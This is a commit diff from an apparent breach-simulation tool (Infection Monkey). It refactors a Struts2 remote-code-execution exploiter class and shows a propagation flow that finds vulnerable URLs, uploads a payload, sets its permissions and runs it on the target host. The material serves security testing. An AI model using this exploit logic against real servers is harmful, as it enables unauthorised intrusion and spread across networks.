Struts2 refactored to use default_exploit_host function

2018-08-21 12:31:50 +03:00 · 2018-08-21 12:31:50 +03:00 · 071535fd01
parent beb8dfed92
commit 071535fd01
1 changed files with 28 additions and 37 deletions
--- a/infection_monkey/exploit/struts2.py
+++ b/infection_monkey/exploit/struts2.py
@ -10,7 +10,7 @@ import re

 import logging
 from web_rce import WebRCE
-import copy
+from posixpath import join

 __author__ = "VakarisZ"

@ -23,45 +23,36 @@ class Struts2Exploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
-        super(Struts2Exploiter, self).__init__(host)
+        super(Struts2Exploiter, self).__init__(host, None)

    def exploit_host(self):
-        # Get open ports
-        ports = self.get_ports_w(self.HTTP, ["http"])
-        if not ports:
-            return False
-        # Get urls to try to exploit
-        urls = self.build_potential_urls(ports)
-        vulnerable_urls = []
-        for url in urls:
-            # Get full URL
-            url = self.get_redirected(url)
-            if self.check_if_exploitable(url):
-                vulnerable_urls.append(url)
-        self._exploit_info['vulnerable_urls'] = vulnerable_urls
-        if not vulnerable_urls:
-            return False
+        return self.default_exploit_host(dropper=True)

-        if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
-            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
-            return True
-
-        if not self.set_host_arch(vulnerable_urls[0]):
-            return False
-
-        data = self.upload_monkey(vulnerable_urls[0])
-
-        # We can't use 'if not' because response may be ''
-        if data is not False and data['response'] is False:
-            return False
-
-        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
-            return False
-
-        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
-            return False
-
-        return True
+    def build_potential_urls(self, ports, extensions=None):
+        """
+        We need to override this method to get redirected url's
+        :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
+        Eg. ports: [[80, False], [443, True]]
+        :param extensions: What subdirectories to scan. www.domain.com[/extension]
+        :return: Array of url's to try and attack
+        """
+        url_list = []
+        if extensions:
+            extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
+        else:
+            extensions = [""]
+        for port in ports:
+            for extension in extensions:
+                if port[1]:
+                    protocol = "https"
+                else:
+                    protocol = "http"
+                url = join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)
+                redirected_url = self.get_redirected(url)
+                url_list.append(redirected_url)
+        if not url_list:
+            LOG.info("No attack url's were built")
+        return url_list

    @staticmethod
    def get_redirected(url):